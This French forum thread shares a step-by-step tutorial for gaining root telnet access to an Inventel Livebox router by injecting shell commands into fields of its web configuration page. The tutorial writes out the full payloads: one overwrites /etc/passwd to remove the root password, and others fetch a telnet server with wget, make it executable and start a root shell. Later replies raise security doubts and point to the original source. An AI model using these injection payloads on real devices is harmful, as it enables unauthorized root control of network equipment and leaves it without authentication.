Contenu | Rechercher | Menus

Annonce

Si vous avez des soucis pour rester connecté, déconnectez-vous puis reconnectez-vous depuis ce lien en cochant la case
Me connecter automatiquement lors de mes prochaines visites.

À propos de l'équipe du forum.

#1 Le 06/08/2008, à 12:29

Enzo83

Telnet sur Livebox Inventel

Bonjour,

Ce petit Tuto étant fort sympathique je vous le fais donc partagez avec grand plaisir big_smile
Et surtout hésiter pas à le commenter.

Jusque la tout le monde c'est qu'il était impossible de rentré en Telnet sur les live Box,  et pour temps quel dommage car rien que pour affiné le pare feu au petit oignons cela serai fort sympathique ou même débloquer le Sip big_smile

Donc pour ce faire on exploite une faille sur le firmware 5.03.3 cela ne marche pas avec les nouveaux firmwave ! Actuellement nous somme en INVENTEL version : v5.10

Le problème et la je compte sur toute la communauté pour cela ! c'est que la version 5.03.3 gère très mal la téléphonie illimite et donc perte de la téléphone illimité cela n'étant pas bien grave si vous avez pense à faire une sauvegarde avant du firmwave !!! cela vous éviteras de remettre à jour votre live box pendant 2 heure !!! mais quoi qu'il en soit tout rentre dans 'ordre au bout du compte.

Donc ma question si quelqu'un arrive a implanté un Telnet avec cette méthode sur la dernière version soit la 5.10fr je l'invite à modifier se Tuto avec grand plaisir, car mais compétence sont encore trop limité dans le monde des commandes linux et je m'en excuse mais je tourne encore en dual boot ubuntu/xp tongue

Bref ce tuto n'est pas de moi mais de  maxipc que je remercie

Au fait TESTER ET APPROUVER tongue

Bonne lecture

voila un petit aperçu en http://picasaweb.google.com/lbellico/Te … 9864348098

Telnet sur Livebox Inventel

Je vais expliquée dans ce tuto comment faire pour installer un serveur telnet sur une livebox inventel, cela peut servir à  la débrider ou a connecter une clé usb dessus. Tout ceci avec rien d'autre qu'un cable ethernet. Cette méthode utilise une faille dans la page de config. de la livebox.

Sommaire :
1.Matériel réquis
2.Comment Faire ?
3.Annexe

Matériel réquis :
-Une livebox réliée au pc en Ethernet.
-Une livebox version 5.03.3, si vous avez une livebox de version supérieure télécharger le firmware ici : http://livebox.nigateo.info/download.php?op=mydown&did=9
-Le logiciel  RGWRepair.exe -> sur votre cd de livebox ou ici : http://www.porciello.com/softs/RGWRepair.exe
-Le logiciel utelnetd -> ici : http://www.agp.dsl.pipex.com/files/utelnetd
-Le logiciel TypSoft FTp server -> ici : http://php.typsoft.com/download.php?id=1

Comment Faire ?
Etape 1: (Uniquement si votre Livebox n'est pas en version 5.03.3, sinon -> Etape 2)
Attention cette manipulation va effacer tout vos paramètres.

Ouvrez le logiciel rgwrepair.exe et suivez les instructions, quand le logiciel vous est demandée choissisez le firmware v5.03.3 que vous avez téléchargée. Ensuite attendre que la livebox redemmare puis connecter le cable ethernet sur
le port rouge de la livebox.

Etape 2 :
Aller sur la page de configuration internet de la livebox et dans le champ Identifiant, ecrire (sans les guillemets) :
";echo root::0:0:root:/root:/bin/sh >/etc/passwd"
Ceci enlève le mt de passe route de la livebox.

Etape 3 :
Aller dans Configuration -> Avancée -> Réseau puis modifier les paramètres comme suit :

Activation du serveur DHCP  Ne pas cocher
Adresse IP LAN  10.0.0.1
Adresse de broadcast du LAN  10.0.0.255
Masque de sous-réseau  255.0.0.0

Début de la plage DHCP  10.0.0.2
Fin de la plage DHCP  10.0.0.4

Puis faites appliquer la configuration.
La livebox va redemmarer, pendant ce temps, allez dans les propriétés de votre carte réseau et allez dans les propriétés de TCP/IP, entrez les parametres suivants :
Adresse IP : 10.0.0.2
Masque de sous réseau : 255.0.0.0
Passerelle : 10.0.0.1

DNS primaire : 10.0.0.1

Appliquer les paramètres et fermez les propriétés.

Etape 4 :
Maintenant installez Typsoft FTP Server, aller dans Setup ->Users et vérifiez que l'utilisateur Anonymous existe bien, et dans le champ Root directory mettez un dossier de votre choix, cocher la case Virtual directory, cliquez sur Save puis sur Close.

Laissez ouvert le serveur, et allez dans le dossier que vous avez choisis et mettez le fichier utelnetd que vous avez téléchargez puis renommer le en u . Attention : C'est trés important, renommer le bien en "u"

Etape 5 :
Attention, maintenant l'adresse de la livebox est 10.0.0.1.
Allez dans Configuration -> Avancée -> Sans Fil
Et dans le nom de la livebox mettez (sans les guillemets) : ";cd /etc;wget ftp://10.0.0.2/u"
Et appliquer les paramètres, la Livebox va redemmarer et vous devriez apercevoir dans le fenetre de Typsoft FTP du texte qui defile, c'est en fait la livebox qui telecharge le serveur telnet.

Etape 6 :
Allez dans Configuration -> Avancée -> Sans Fil
Et dans le nom de la livebox mettez (sans les guillemets) : ";chmod 777 /etc/u"
Et appliquer les paramètres, la Livebox va redemmarer.

Etape 7 :
Allez dans Configuration -> Avancée -> Sans Fil
Et dans le nom de la livebox mettez (sans les guillemets) : ";/etc/u -p 23 -l /bin/sh -d"
Et appliquer les paramètres, la Livebox va redemmarer.

Etape 8 :
C'est fini !, maintenant allez dans menu demmarer et cliquez sur executer et tapez cmd.
Maintenant tapez dans la fenetre qui s'est ouverte (cmd) : telnet 10.0.0.1
Vous etes connécté à  la livebox.

Annexe :

1.Les pages cachés
En regardant dans le dossier /webs/, on s'apercoit qu'il existe des pages cachées, telle que hotspot_activate.html, tout ceci est a étudiée.
Voila la liste des pages webs contenue dans /webs/ :

Dernière modification par Enzo83 (Le 06/08/2008, à 12:40)

Hors ligne

#2 Le 07/08/2008, à 11:24

bubu8941

Re : Telnet sur Livebox Inventel

Je ne sais pas si c'est super secure de mettre en place un serveur telnet sur une livebox... quoique si tu configure le firewall pour bloquer le port 23 après  ... à voir


Le bar est loin, la route est verglacée, l'église est proche mais je marcherai avec prudence.
Un psychotique, c'est quelqu'un qui croit dur comme fer que 2 et 2 font 5, et qui en est pleinement satisfait.
Un névrosé, c'est quelqu'un qui sait pertinemment que 2 et 2 font 4, et ça le rend malade !

Hors ligne

#3 Le 16/04/2009, à 20:23

Qqun

Re : Telnet sur Livebox Inventel

Pour la VO c'est ici => http://www.agp.dsl.pipex.com/telnet_server.html

Je précise juste, car j'aime pas les gens qui copie les tuto sans citer de source, comme l'a fait le gars sur le lien que tu nous donnes...

#4 Le 16/04/2009, à 22:58

Enzo83

Re : Telnet sur Livebox Inventel

Qqun a écrit :

Pour la VO c'est ici => http://www.agp.dsl.pipex.com/telnet_server.html

Je précise juste, car j'aime pas les gens qui copie les tuto sans citer de source, comme l'a fait le gars sur le lien que tu nous donnes...

Effectivement je te donne 100% raison à se sujet la mais c aussi un peut ma faute car je n'est pas poussé les recherche plus loin donc mille excuse et merci d'avoir rectifier le tir wink

Hors ligne